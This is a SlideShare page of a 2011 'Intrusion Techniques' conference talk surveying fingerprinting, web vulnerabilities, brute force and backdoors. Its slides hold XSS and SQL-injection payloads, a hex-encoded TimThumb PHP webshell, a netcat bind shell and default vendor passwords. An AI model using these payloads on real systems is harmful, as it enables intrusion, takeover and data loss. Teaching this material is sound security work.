SlideShare une entreprise Scribd logo
1  sur  32
Télécharger pour lire hors ligne
Intrusion Techniques
                            DcLabs Hacking Tour 2011




Ewerson Guimarães (Crash)                         DcLabs – HackingTour 2011
chương trình nghị sự
Vân tay
Thất bại ở những nơi
Phía sau cánh cửa
bạo lực
vỏ mã
khai thác
Máy quét



Ewerson Guimarães (Crash)          DcLabs – HackingTour 2011
FingerPrint
 Grab informations about a target host.
 Ex: It's used to identify Operational System and/or
 Services(daemon) version number by TCP/IP response's
 unique characteristics.

 The best tool for discovery operating systems, services,
 devices and others: NMAP (Network Mapper)

 Basic commands:

 nmap host (Basic)
 nmap –sV host (Service Versions)
 nmap –PN host ( ICMP ECHO-REPLY Ignore)
 nmap –O host (Try to grab O.S version)
 nmap –f host (Firewall/IDS/IPS Evasion)


Ewerson Guimarães (Crash)                                   DcLabs – HackingTour 2011
Passive - FingerPrint

 • TTL - When the operating system sets the Time To Live
   on the outbound packet

 • Window Size - When the operating system sets the
   Window Size at.

 • DF - =The operating system set the Don't Fragment bit.

 • TOS - The operating system set the Type of Service,
   and if so, at what.




Ewerson Guimarães (Crash)                                   DcLabs – HackingTour 2011
FingerPrint
Matrix:




Ewerson Guimarães (Crash)                 DcLabs – HackingTour 2011
FingerPrint
U. Bourne




Ewerson Guimarães (Crash)                 DcLabs – HackingTour 2011
FingerPrint
In BackTrack Linux you can find many softwares to
Finger-Print




               Http://www.backtrack-linux.com


Ewerson Guimarães (Crash)                           DcLabs – HackingTour 2011
Web Vulnerability
These vulnerabilities are initially explored through
malicious browser requests compromising the target
in a matter of minutes



 Cross Site (XSS) – Reflected / Stored

 SQL-Injection

 PHP (LFI / RFI/ AFU / RCE)




Ewerson Guimarães (Crash)                         DcLabs – HackingTour 2011
Web Vulnerability
Cross-site scripting (XSS) is a type of computer security
vulnerability typically found in web applications that enables
malicious attackers to inject client-side script into web pages
viewed by other users.

Spekx – Knowledge Base -
http://server/pls/ksp_acesso.login_script?p_time=%221%22%
3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

LMS Web Ensino – TOTVS
http://site/lms/sistema/webensino/index.php?
modo=resbusca_biblioteca&pChave=a%22%2F%3E+
%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E
&Submit=Buscar



Ewerson Guimarães (Crash)                                         DcLabs – HackingTour 2011
Web Vulnerability




                 Reflected / Stored Xss



                            DEMO




Ewerson Guimarães (Crash)                 DcLabs – HackingTour 2011
Web Vulnerability




Ewerson Guimarães (Crash)               DcLabs – HackingTour 2011
What is the impact?


Why?


Examples?

Ewerson Guimarães (Crash)   DcLabs – HackingTour 2011
Web Vulnerability
SQL-Injection

It occurs when the attacker can insert a series of SQL statements
within a 'query' by manipulating the data entry application.

SELECT campos FROM tabela WHERE campo = 'test@test.com';

Inject string: some' OR 'x'='x
SELECT fields FROM table WHERE field = ‘some' OR 'x'='x';

admin'--      " or 0=0 #          ' or 1=1--      hi' or 'a'='a
' or 0=0 --   or 0=0 #            " or 1=1--      hi') or ('a'='a
" or 0=0 --   ' or 'x'='x         or 1=1--        hi") or ("a"="a
or 0=0 --     " or "x"="x         ' or a=a--      ‘);Drop table x;--
' or 0=0 #    ') or ('x'='x       hi" or 1=1 --   ') or ('a'='a




Ewerson Guimarães (Crash)                                              DcLabs – HackingTour 2011
SQL-Injection




                 LIVE DEMO OCOMON
            Throwing fudge at the fan

Ewerson Guimarães (Crash)               DcLabs – HackingTour 2011
Web Vulnerability
CGI/PHP Command Injection

It occurs when the attacker insert a series of
commands exploiting vulnerable CGI/PHP scripts

OneorZero – AFU + LFI

http://server/oneorzero/index.php?controller=../[FILE].php

WordPress TimThumb (Theme) Plugin – RCE
 x47x49x46x38x39x61x01x00x01x00x80x00x00
 xFFxFFxFFx00x00x00x21xF9x04x01x00x00x00
 x00x2Cx00x00x00x00x01x00x01x00x00x02x02
 x44x01x00x3Bx00x3Cx3Fx70x68x70x20x40x65
 x76x61x6Cx28x24x5Fx47x45x54x5Bx27x63x6D
 x64x27x5Dx29x3Bx20x3Fx3Ex00


Ewerson Guimarães (Crash)                                    DcLabs – HackingTour 2011
Default/Weak passwords
Default passwords are set by its manufacturers/developers
and were not changed after the installation/configuration.

As supplied by the system vendor and meant to be changed at
installation time (Nobody do this shit)

Ex: Sw 3Com:
User: security - Pass: security

FireBird:
User: sysdba - Pass: masterkey

Weak: Passwords that are easily guessed or in a keyboard
sequential
Ex: 123456 - Love - House´s phone - Birthday - Etc...

Ewerson Guimarães (Crash)                                    DcLabs – HackingTour 2011
Brute Force
It consists in using random combinations of
characters/numbers and symbols, wordlists and/or
string generators to crack a password

Ex:
John the Ripper
Hydra
SSH Brute Force




Ewerson Guimarães (Crash)                          DcLabs – HackingTour 2011
Brute Force
 DirBuster - DirBuster is a multi threaded java application designed
 to brute force directories and files names on web/application servers




Ewerson Guimarães (Crash)                                           DcLabs – HackingTour 2011
Exploits
Kinds of Exploits:

Local: Usually, the objective of a local exploit is to elevate
user's privileges on the machine as close as possible to
root (uid=0) or administrator. They are written to exploit
kernel bugs or suid binaries

Remote: It works over a network connection and
exploit the vulnerable target without any prior access to it.

www.securityfocus.com
www.secunia.com
www.exploit-db.com

0Days It works usually an unpublished exploit from a brand
new found vulnerability. You can buy! $$$$$

Ewerson Guimarães (Crash)                                        DcLabs – HackingTour 2011
Exploits


If Kernel was patched?
      Will we cry?
 Alexos=>




Ewerson Guimarães (Crash)              DcLabs – HackingTour 2011
Exploits

      No!!!! Fuck him!!!
     We have others ways to pwn the box

     GNU C library dynamic linker

     Suid´s

     Etc...




Ewerson Guimarães (Crash)                 DcLabs – HackingTour 2011
Backdoors/RootKits
Used to maintain access to the system

We can Netcat use for this purpose:
nc –vlp 5555 –e /bin/bash

PHP - ASP - JSP

RootKits

The main purpose of a rootkit is to hide the attacker's presence
replacing vital system binaries from target's system
Example:
Hide files (with match strings)
Run command when match strings
Hide processes
Hide open ports, and others.


Ewerson Guimarães (Crash)                                      DcLabs – HackingTour 2011
Scanners/Fuzzers
There are 2 types of scanners: Specific which are written for
a specific vulnerability (BSQLHacker, SQLMAP) and Generic
which are written for various kinds of vulnerabilities. Generic
scanners use known service banners/strings to locate the
potential target/vulnerabilities




 W3af
                                     Nessus

Ewerson Guimarães (Crash)                                    DcLabs – HackingTour 2011
Scanners/Fuzzers




Ewerson Guimarães (Crash)               DcLabs – HackingTour 2011
Scanners/Fuzzers




Ewerson Guimarães (Crash)               DcLabs – HackingTour 2011
Sniffers
Sniffer monitors and analyzes network traffic. Some of these
packets may contain critical information (such as logins,
passwords and cool infos )
WhireShark -




Ewerson Guimarães (Crash)                                   DcLabs – HackingTour 2011
MetaSploit




Ewerson Guimarães (Crash)         DcLabs – HackingTour 2011
MetaSploit


               Let´s Fuck Windows?




Ewerson Guimarães (Crash)            DcLabs – HackingTour 2011
Hardening your server

HnTool is an open source (GPLv2) hardening tool for Unix.
It scans your system for vulnerabilities or problems in
configuration files allowing you to get a quick overview of
the security status of your system.




Ewerson Guimarães (Crash)                                     DcLabs – HackingTour 2011
Questions?


Ewerson Guimarães (Crash)   DcLabs – HackingTour 2011
Ewerson Guimarães (Crash)   DcLabs – HackingTour 2011
Contact


 Crash - crash@dclabs.com.br

 Irc: irc.freenode.net #dclabs

 twitter: @crashbrz




Ewerson Guimarães (Crash)         DcLabs – HackingTour 2011

Contenu connexe

Dernier

Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Farhan Tariq
 
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...AliaaTarek5
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentPim van der Noll
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsRavi Sanghani
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfNeo4j
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterMydbops
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
Manual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance AuditManual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance AuditSkynet Technologies
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPathCommunity
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityIES VE
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Strongerpanagenda
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch TuesdayIvanti
 

Dernier (20)

Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...
 
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and Insights
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdf
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL Router
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
Manual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance AuditManual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance Audit
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to Hero
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a reality
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch Tuesday
 

En vedette

2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by Hubspot2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by HubspotMarius Sescu
 
Everything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPTEverything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPTExpeed Software
 
Product Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage EngineeringsProduct Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage EngineeringsPixeldarts
 
How Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental HealthHow Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental HealthThinkNow
 
AI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdfAI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdfmarketingartwork
 
PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024Neil Kimberley
 
Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)contently
 
How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024Albert Qian
 
Social Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie InsightsSocial Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie InsightsKurio // The Social Media Age(ncy)
 
Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024Search Engine Journal
 
5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summarySpeakerHub
 
ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd Clark Boyd
 
Getting into the tech field. what next
Getting into the tech field. what next Getting into the tech field. what next
Getting into the tech field. what next Tessa Mero
 
Google's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search IntentGoogle's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search IntentLily Ray
 
Time Management & Productivity - Best Practices
Time Management & Productivity -  Best PracticesTime Management & Productivity -  Best Practices
Time Management & Productivity - Best PracticesVit Horky
 
The six step guide to practical project management
The six step guide to practical project managementThe six step guide to practical project management
The six step guide to practical project managementMindGenius
 
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...RachelPearson36
 

En vedette (20)

2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by Hubspot2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by Hubspot
 
Everything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPTEverything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPT
 
Product Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage EngineeringsProduct Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage Engineerings
 
How Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental HealthHow Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental Health
 
AI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdfAI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdf
 
Skeleton Culture Code
Skeleton Culture CodeSkeleton Culture Code
Skeleton Culture Code
 
PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024
 
Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)
 
How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024
 
Social Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie InsightsSocial Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie Insights
 
Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024
 
5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary
 
ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd
 
Getting into the tech field. what next
Getting into the tech field. what next Getting into the tech field. what next
Getting into the tech field. what next
 
Google's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search IntentGoogle's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search Intent
 
How to have difficult conversations
How to have difficult conversations How to have difficult conversations
How to have difficult conversations
 
Introduction to Data Science
Introduction to Data ScienceIntroduction to Data Science
Introduction to Data Science
 
Time Management & Productivity - Best Practices
Time Management & Productivity -  Best PracticesTime Management & Productivity -  Best Practices
Time Management & Productivity - Best Practices
 
The six step guide to practical project management
The six step guide to practical project managementThe six step guide to practical project management
The six step guide to practical project management
 
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
 

Vale Security Conference - 2011 - 4 - Ewerson Guimarães (Crash) [DC Labs]

  • 1. Intrusion Techniques DcLabs Hacking Tour 2011 Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 2. chương trình nghị sự Vân tay Thất bại ở những nơi Phía sau cánh cửa bạo lực vỏ mã khai thác Máy quét Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 3. FingerPrint Grab informations about a target host. Ex: It's used to identify Operational System and/or Services(daemon) version number by TCP/IP response's unique characteristics. The best tool for discovery operating systems, services, devices and others: NMAP (Network Mapper) Basic commands: nmap host (Basic) nmap –sV host (Service Versions) nmap –PN host ( ICMP ECHO-REPLY Ignore) nmap –O host (Try to grab O.S version) nmap –f host (Firewall/IDS/IPS Evasion) Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 4. Passive - FingerPrint • TTL - When the operating system sets the Time To Live on the outbound packet • Window Size - When the operating system sets the Window Size at. • DF - =The operating system set the Don't Fragment bit. • TOS - The operating system set the Type of Service, and if so, at what. Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 6. FingerPrint U. Bourne Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 7. FingerPrint In BackTrack Linux you can find many softwares to Finger-Print Http://www.backtrack-linux.com Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 8. Web Vulnerability These vulnerabilities are initially explored through malicious browser requests compromising the target in a matter of minutes Cross Site (XSS) – Reflected / Stored SQL-Injection PHP (LFI / RFI/ AFU / RCE) Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 9. Web Vulnerability Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. Spekx – Knowledge Base - http://server/pls/ksp_acesso.login_script?p_time=%221%22% 3Cscript%3Ealert%28document.cookie%29;%3C/script%3E LMS Web Ensino – TOTVS http://site/lms/sistema/webensino/index.php? modo=resbusca_biblioteca&pChave=a%22%2F%3E+ %3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E &Submit=Buscar Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 10. Web Vulnerability Reflected / Stored Xss DEMO Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 11. Web Vulnerability Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 12. What is the impact? Why? Examples? Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 13. Web Vulnerability SQL-Injection It occurs when the attacker can insert a series of SQL statements within a 'query' by manipulating the data entry application. SELECT campos FROM tabela WHERE campo = 'test@test.com'; Inject string: some' OR 'x'='x SELECT fields FROM table WHERE field = ‘some' OR 'x'='x'; admin'-- " or 0=0 # ' or 1=1-- hi' or 'a'='a ' or 0=0 -- or 0=0 # " or 1=1-- hi') or ('a'='a " or 0=0 -- ' or 'x'='x or 1=1-- hi") or ("a"="a or 0=0 -- " or "x"="x ' or a=a-- ‘);Drop table x;-- ' or 0=0 # ') or ('x'='x hi" or 1=1 -- ') or ('a'='a Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 14. SQL-Injection LIVE DEMO OCOMON Throwing fudge at the fan Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 15. Web Vulnerability CGI/PHP Command Injection It occurs when the attacker insert a series of commands exploiting vulnerable CGI/PHP scripts OneorZero – AFU + LFI http://server/oneorzero/index.php?controller=../[FILE].php WordPress TimThumb (Theme) Plugin – RCE x47x49x46x38x39x61x01x00x01x00x80x00x00 xFFxFFxFFx00x00x00x21xF9x04x01x00x00x00 x00x2Cx00x00x00x00x01x00x01x00x00x02x02 x44x01x00x3Bx00x3Cx3Fx70x68x70x20x40x65 x76x61x6Cx28x24x5Fx47x45x54x5Bx27x63x6D x64x27x5Dx29x3Bx20x3Fx3Ex00 Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 16. Default/Weak passwords Default passwords are set by its manufacturers/developers and were not changed after the installation/configuration. As supplied by the system vendor and meant to be changed at installation time (Nobody do this shit) Ex: Sw 3Com: User: security - Pass: security FireBird: User: sysdba - Pass: masterkey Weak: Passwords that are easily guessed or in a keyboard sequential Ex: 123456 - Love - House´s phone - Birthday - Etc... Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 17. Brute Force It consists in using random combinations of characters/numbers and symbols, wordlists and/or string generators to crack a password Ex: John the Ripper Hydra SSH Brute Force Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 18. Brute Force DirBuster - DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 19. Exploits Kinds of Exploits: Local: Usually, the objective of a local exploit is to elevate user's privileges on the machine as close as possible to root (uid=0) or administrator. They are written to exploit kernel bugs or suid binaries Remote: It works over a network connection and exploit the vulnerable target without any prior access to it. www.securityfocus.com www.secunia.com www.exploit-db.com 0Days It works usually an unpublished exploit from a brand new found vulnerability. You can buy! $$$$$ Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 20. Exploits If Kernel was patched? Will we cry? Alexos=> Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 21. Exploits No!!!! Fuck him!!! We have others ways to pwn the box GNU C library dynamic linker Suid´s Etc... Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 22. Backdoors/RootKits Used to maintain access to the system We can Netcat use for this purpose: nc –vlp 5555 –e /bin/bash PHP - ASP - JSP RootKits The main purpose of a rootkit is to hide the attacker's presence replacing vital system binaries from target's system Example: Hide files (with match strings) Run command when match strings Hide processes Hide open ports, and others. Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 23. Scanners/Fuzzers There are 2 types of scanners: Specific which are written for a specific vulnerability (BSQLHacker, SQLMAP) and Generic which are written for various kinds of vulnerabilities. Generic scanners use known service banners/strings to locate the potential target/vulnerabilities W3af Nessus Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 24. Scanners/Fuzzers Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 25. Scanners/Fuzzers Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 26. Sniffers Sniffer monitors and analyzes network traffic. Some of these packets may contain critical information (such as logins, passwords and cool infos ) WhireShark - Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 27. MetaSploit Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 28. MetaSploit Let´s Fuck Windows? Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 29. Hardening your server HnTool is an open source (GPLv2) hardening tool for Unix. It scans your system for vulnerabilities or problems in configuration files allowing you to get a quick overview of the security status of your system. Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
